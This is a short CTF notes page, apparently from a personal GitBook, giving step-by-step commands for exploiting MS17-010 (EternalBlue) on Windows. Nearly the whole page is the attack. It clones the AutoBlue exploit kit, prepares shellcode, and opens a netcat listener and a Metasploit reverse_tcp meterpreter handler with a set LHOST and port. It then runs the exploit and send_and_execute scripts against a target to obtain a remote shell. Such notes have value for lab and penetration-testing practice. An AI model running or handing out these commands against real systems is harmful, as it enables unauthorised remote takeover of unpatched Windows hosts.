> For the complete documentation index, see [llms.txt](https://iptracej.gitbook.io/windows-linux-and-active-directory-ctf-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://iptracej.gitbook.io/windows-linux-and-active-directory-ctf-notes/rce-collection/windows/ms17-010.md).

# MS17-010

### Preparation

```bash
git clone https://github.com/3ndG4me/AutoBlue-MS17-010
cd AutoBlue-MS17-010

# Check if your target is vulnerabile
python eternal_checker.py $RHOST

# Prepara attack payloads
cd shellcode
./shell_prep.sh # it is worth choosing the meterpreter 
cd ../
```

### Execution

{% code overflow="wrap" %}

```bash
# Non meterpreter version
Kali> rlwrap nc -nlvp 53
Kali> python eternalblue_exploit7.py $RHOST shellcode/sc_x86.bin 

# Meterpreter version 
Kali> sudo msfconsole -q -x "use exploit/multi/handler;set PAYLOAD windows/meterpreter/reverse_tcp;set AutoRunScript post/windows/manage/migrate;set LHOST 192.168.45.183;set LPORT 1234;run -j"

Kali> python eternalblue_exploit7.py $RHOST shellcode/sc_x86.bin
```

{% endcode %}

### Send\_andexecute.py

<pre class="language-bash"><code class="lang-bash"><strong>This is so obsolete... 
</strong><strong># pip3 install virtualenv==20.21.1
</strong># virtualenv --python=python2 env
# source env/bin/activate.fish
# pip install impacket==0.9.22
#python2 send_and_execute.py $RHOST shellcode/sc_x86.bin
</code></pre>
